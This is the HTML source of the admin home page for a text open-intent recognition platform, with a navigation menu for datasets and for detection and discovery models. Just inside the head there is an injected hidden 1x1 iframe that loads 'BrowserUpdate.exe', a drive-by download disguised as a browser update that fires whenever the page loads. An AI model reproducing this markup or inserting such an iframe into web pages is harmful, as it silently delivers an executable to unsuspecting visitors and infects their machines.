<!doctype html>
<html class="x-admin-sm">
    <head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>
        <meta charset="UTF-8">
        <title>Text Open Intent Recognition Platform</title>
        <meta name="renderer" content="webkit|ie-comp|ie-stand">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta name="viewport" content="width=device-width,user-scalable=yes, minimum-scale=0.4, initial-scale=0.8,target-densitydpi=low-dpi" />
        <meta http-equiv="Cache-Control" content="no-siteapp" />
        <link rel="stylesheet" href="/static/lib/xadmin/css/font.css">
        <link rel="stylesheet" href="/static/lib/xadmin/css/xadmin.css">
        
        <!-- <link rel="stylesheet" href="./css/theme5.css"> -->
        <script src="/static/lib/layui/layui.js" charset="utf-8"></script>
        <script type="text/javascript" src="/static/lib/xadmin/js/xadmin.js"></script>
<!--             <link rel="stylesheet" href="/static/css/main.css" /> -->
        <!-- 让IE8/9支持媒体查询，从而兼容栅格 -->
        <!--[if lt IE 9]>
          <script src="https://cdn.staticfile.org/html5shiv/r29/html5.min.js"></script>
          <script src="https://cdn.staticfile.org/respond.js/1.4.2/respond.min.js"></script>
        <![endif]-->
        <script>
            // 是否开启刷新记忆tab功能
            // var is_remember = false;
        </script>
    </head>
    <body class="index">
        <!-- 顶部开始 -->
        <div class="container">
            <div class="logo">
                <a >TEXTOIR</a></div>
            <div class="left_open">
                <a><i title="Hidden Left" class="iconfont">&#xe699;</i></a>
            </div>
            <ul class="layui-nav left fast-add"  lay-filter="">
            </ul>
            <ul class="icons layui-nav right " style="margin-right:30px">
                <li class="layui-nav-item" ><a href="#" class="icon brands fa-github"><span class="label">Source Code</span></a></li>
            </ul>
<!--             <ul class="layui-nav right " lay-filter="" style="margin-right:30px">
               <li><a href="#" class="icon brands fa-github"><span class="label">GitHub</span></a></li>
                 <li class="layui-nav-item" style="text-align:center;padding-left:0px">
                    <a style ='font-size:14px;font-weight:550;' href="https://thuiar.github.io" >GitHub</a>
                    <a class="icon brands fa-github" href="https://thuiar.github.io" target="_blank" style ="font-size:25px;font-weight:550;" ><span class="label">GitHub</span></a>
                </li> 
            </ul> -->
        </div>
        <!-- 顶部结束 -->
        <!-- 中部开始 -->
        <!-- 左侧菜单开始 -->
        <div class="left-nav">
            <div id="side-nav">
                <ul id="nav">
                    <li>
                        <a href="javascript:;" onclick="xadmin.add_tab('Dataset Management','thedataset/toDatasetList')">
                            <i class="iconfont left-nav-li" lay-tips="Data Management">&#xe70c;</i>
                            <cite>Dataset Management</cite>
                            </a>
                    </li>
                    <li>
                        <a href="javascript:;">
                            <i class="iconfont left-nav-li" lay-tips="Open Intent Detection">&#xe6a9;</i>
                            <cite>Open Intent Detection</cite>
                            <i class="iconfont nav_right">&#xe697;</i></a>
                            <ul class="sub-menu">
                                <li>
                                    <a onclick="xadmin.add_tab('Detection Model Management','detection/model_management')">
                                        <i class="iconfont">&#xe6a7;</i>
                                        <cite>Model Management</cite></a>
                                </li>
                                <li>
                                    <a onclick="xadmin.add_tab('Detection Model Training','detection/model_training')">
                                        <i class="iconfont">&#xe6a7;</i>
                                        <cite>Model Training</cite></a>
                                </li>
                                <li>
                                    <a onclick="xadmin.add_tab('Detection Model Evaluation','detection/model_test')">
                                        <i class="iconfont">&#xe6a7;</i>
                                        <cite>Model Evaluation</cite></a>
                                </li>
                                <li>
                                    <a onclick="xadmin.add_tab('Detection Model Analysis','detection/model_analysis')">
                                        <i class="iconfont">&#xe6a7;</i>
                                        <cite>Model Analysis</cite></a>
                                </li>
                            </ul>
                    </li>
                    <li>
                        <a href="javascript:;">
                            <i class="iconfont left-nav-li" lay-tips="Open Intent Discovery">&#xe704;</i>
                            <cite>Open Intent Discovery</cite>
                            <i class="iconfont nav_right">&#xe697;</i></a>
                            <ul class="sub-menu">
                                <li>
                                    <a onclick="xadmin.add_tab('Discovery Model Management','discovery/model_management')">
                                        <i class="iconfont">&#xe6a7;</i>
                                        <cite>Model Management</cite></a>
                                </li>
                                <li>
                                    <a onclick="xadmin.add_tab('Discovery Model Training','discovery/model_training')">
                                        <i class="iconfont">&#xe6a7;</i>
                                        <cite>Model Training</cite></a>
                                </li>
                                <li>
                                    <a onclick="xadmin.add_tab('Discovery Model Evaluation','discovery/model_test')">
                                        <i class="iconfont">&#xe6a7;</i>
                                        <cite>Model Evaluation</cite></a>
                                </li>
                                <li>
                                    <a onclick="xadmin.add_tab('Discovery Model Analysis','discovery/model_analysis')">
                                        <i class="iconfont">&#xe6a7;</i>
                                        <cite>Model Analysis</cite></a>
                                </li>
                            </ul>
                    </li>
                    <li>
                        <a href="javascript:;" onclick="xadmin.add_tab('Open Intent Recognition','annotation/data_annotation')">
                            <i class="iconfont left-nav-li" lay-tips="Data Management">&#xe69e;</i>
                            <cite>Open Intent Recognition</cite>
                            </a>
                    </li>
                </ul>
            </div>
        </div>
        <!-- <div class="x-slide_left"></div> -->
        <!-- 左侧菜单结束 -->
        <!-- 右侧主体开始 -->
        <div class="page-content">
            <div class="layui-tab tab" lay-filter="xbs_tab" lay-allowclose="false">
                <ul class="layui-tab-title">
                    <li class="home">
                        <i class="layui-icon">&#xe68e;</i>Home Page</li></ul>
                <div class="layui-unselect layui-form-select layui-form-selected" id="tab_right">
                    <dl>
                        <dd data-type="this">Close</dd>
                        <!-- <dd data-type="other">Close Others</dd> -->
                        <dd data-type="all">Close All</dd></dl>
                </div>
                <div class="layui-tab-content">
                    <div class="layui-tab-item layui-show">
                        <iframe src='/welcome' frameborder="0" scrolling="yes" class="x-iframe"></iframe>
                    </div>
                </div>
                <div id="tab_show"></div>
            </div>
        </div>
        <div class="page-content-bg"></div>
        <style id="theme_style"></style>
        <!-- 右侧主体结束 -->
        <!-- 中部结束 -->
        <script>//百度统计可去掉
            function addTabNew(mytitle, htmlurl) {
                xadmin.add_tab(mytitle, htmlurl )
                 var $ = layui.jquery
                ,element = layui.element;
                //先判断是否已经有了tab
                var arrayObj = new Array();　//创建一个数组  
                $(".layui-tab-title").find('li').each(function() {
                    var y = $(this).attr("lay-id"); 
                    arrayObj.push(y);
                });
                //alert("遍历取到的数组："+arrayObj);
                var have=$.inArray(mytitle, arrayObj);  //返回 3,
                if (have>=0) {
                    //tab已有标签
                    //alert("遍历的已有标签："+mytitle);
                    element.tabChange('demo', mytitle); //切换到当前点击的页面
                } else{
                    //没有相同tab
                    // alert("遍历的没有相同tab："+mytitle);
                    var h = $(window).height()-150;
                    element.tabAdd('demo', {
                        title:mytitle //用于演
                        ,content: '<iframe style="width: 100%;height:'+h+'px;border:none;" scrolling="auto" src='+htmlurl+' ></iframe>'
                        ,id: mytitle //实际使用一般是规定好的id，这里以时间戳模拟下
                    })
                    element.tabChange('demo', mytitle); //切换到当前点击的页面
                } 
            }
        </script>
    </body>

</html>